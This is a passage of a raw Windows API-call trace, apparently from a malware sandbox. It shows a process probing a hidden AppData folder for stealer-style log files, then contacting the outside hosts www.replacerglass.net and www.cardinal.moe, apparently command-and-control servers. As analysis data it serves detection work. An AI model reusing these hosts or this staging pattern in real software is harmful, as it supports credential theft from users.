DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.511] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.511] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.511] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.511] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.511] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.511] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.511] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.512] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.512] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.512] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.512] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.512] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.512] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.512] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.512] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.512] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0210.512] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.512] Sleep (dwMilliseconds=0x7d0) [0210.525] Sleep (dwMilliseconds=0x7d0) [0210.541] Sleep (dwMilliseconds=0x7d0) [0210.586] Sleep (dwMilliseconds=0x7d0) [0210.588] Sleep (dwMilliseconds=0x7d0) [0210.609] Sleep (dwMilliseconds=0x7d0) [0210.619] Sleep (dwMilliseconds=0x7d0) [0210.634] Sleep (dwMilliseconds=0x7d0) [0210.650] Sleep (dwMilliseconds=0x7d0) [0210.666] Sleep (dwMilliseconds=0x7d0) [0210.681] Sleep (dwMilliseconds=0x7d0) [0210.697] socket (af=2, type=1, protocol=6) returned 0x614 [0210.697] getaddrinfo (in: pNodeName="www.replacerglass.net", pServiceName="80", pHints=0x6f0e338*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0e368 | out: ppResult=0x6f0e368*=0x3eb1d10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70acf30*(sa_family=2, sin_port=0x50, sin_addr="216.239.36.21"), ai_next=0x3eb45d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70ad0f0*(sa_family=2, sin_port=0x50, sin_addr="216.239.34.21"), ai_next=0x6efc730*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x70acb70*(sa_family=2, sin_port=0x50, sin_addr="216.239.32.21"), ai_next=0x6eff930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f36b40*(sa_family=2, sin_port=0x50, sin_addr="216.239.38.21"), ai_next=0x0))))) returned 0 [0210.775] connect (s=0x614, name=0x70acf30*(sa_family=2, sin_port=0x50, sin_addr="216.239.36.21"), namelen=16) returned 0 [0210.795] send (s=0x614, buf=0x25a505a*, len=173, flags=0) returned 173 [0210.795] setsockopt (s=0x614, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0210.795] recv (in: s=0x614, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 47490 [0210.934] closesocket (s=0x614) returned 0 [0210.934] Sleep (dwMilliseconds=0x7d0) [0210.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.947] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.947] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0210.947] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.947] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.947] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.947] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.947] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.947] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.947] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.947] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.947] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.947] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.947] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.947] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.947] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.948] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0210.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.948] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.948] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0210.948] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0210.948] Sleep (dwMilliseconds=0x7d0) [0210.962] Sleep (dwMilliseconds=0x7d0) [0210.978] Sleep (dwMilliseconds=0x7d0) [0210.994] Sleep (dwMilliseconds=0x7d0) [0211.009] Sleep (dwMilliseconds=0x7d0) [0211.025] Sleep (dwMilliseconds=0x7d0) [0211.040] Sleep (dwMilliseconds=0x7d0) [0211.056] Sleep (dwMilliseconds=0x7d0) [0211.071] Sleep (dwMilliseconds=0x7d0) [0211.087] Sleep (dwMilliseconds=0x7d0) [0211.105] Sleep (dwMilliseconds=0x7d0) [0211.118] Sleep (dwMilliseconds=0x7d0) [0211.134] Sleep (dwMilliseconds=0x7d0) [0211.149] Sleep (dwMilliseconds=0x7d0) [0211.165] Sleep (dwMilliseconds=0x7d0) [0211.181] Sleep (dwMilliseconds=0x7d0) [0211.196] socket (af=2, type=1, protocol=6) returned 0x614 [0211.196] getaddrinfo (in: pNodeName="www.cardinal.moe", pServiceName="80", pHints=0x6f0e6d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0e708 | out: ppResult=0x6f0e708*=0x0) returned 11001 [0211.656] Sleep (dwMilliseconds=0x7d0) [0211.684] 